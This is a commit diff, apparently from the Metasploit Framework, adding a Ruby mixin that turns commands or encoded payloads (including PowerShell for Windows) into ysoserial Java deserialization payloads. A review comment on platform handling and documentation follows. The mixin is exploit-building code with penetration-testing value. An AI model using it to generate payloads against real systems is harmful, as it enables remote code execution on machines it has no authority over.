Add a new Java Deserialization mixin and use it to set the shell
committed by
Shelby Pace
parent
2bd6b7abc7
commit
8d2e644f4f
@@ -0,0 +1,44 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Msf
|
||||
|
||||
module Exploit::JavaDeserialization
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def generate_java_deserialization_for_command(name, shell, command)
|
||||
# here we force usage of a modified type to avoid compatibility issues with command characters thar are present in
|
||||
# some ysoserial payloads
|
||||
unless %w{ bash cmd powershell }.include? shell
|
||||
raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
|
||||
end
|
||||
|
||||
Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
|
||||
end
|
||||
|
||||
def generate_java_deserialization_for_payload(name, payload)
|
||||
command = nil
|
||||
|
||||
if payload.platform.platforms == [Msf::Module::Platform::Windows]
|
||||
if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
|
||||
command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
|
||||
elsif payload.arch.first == Rex::Arch::ARCH_CMD
|
||||
command = payload.encoded
|
||||
end
|
||||
modified_type = 'cmd'
|
||||
else
|
||||
if payload.arch.first == Rex::Arch::ARCH_CMD
|
||||
command = payload.encoded
|
||||
end
|
||||
modified_type = 'bash'
|
||||
end
|
||||
|
||||
if command.nil?
|
||||
raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
|
||||
end
|
||||
|
||||
Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: modified_type)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
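Review bot: The platform test in `generate_java_deserialization_for_payload` is an exact match, `payload.platform.platforms == [Msf::Module::Platform::Windows]`, so any platform list other than that one-element array falls into the `else` branch and is labelled `bash` without an error. If a payload can carry more than one platform, that would include a list holding Windows plus something else. If the fallthrough is intended, say so where it happens, e.g. `# any platform list other than exactly [Windows] is treated as a bash target`; otherwise let unrecognised platforms reach the existing `command.nil?` raise instead of guessing. Both methods also lack a doc comment: a short YARD header with `# @raise [RuntimeError] if shell is not one of bash, cmd or powershell` on the first, and the unsupported platform/architecture case on the second, would tell module authors what to pass and what to rescue. The comment above the `shell` check has a typo (`thar`).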